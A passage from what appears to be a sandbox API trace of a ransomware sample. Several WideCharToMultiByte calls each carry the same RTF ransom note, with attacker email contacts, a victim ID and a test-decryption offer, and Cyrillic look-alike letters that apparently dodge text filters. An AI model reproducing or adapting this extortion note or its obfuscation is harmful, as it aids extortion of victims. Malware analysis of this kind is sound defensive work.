s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0136.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0136.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 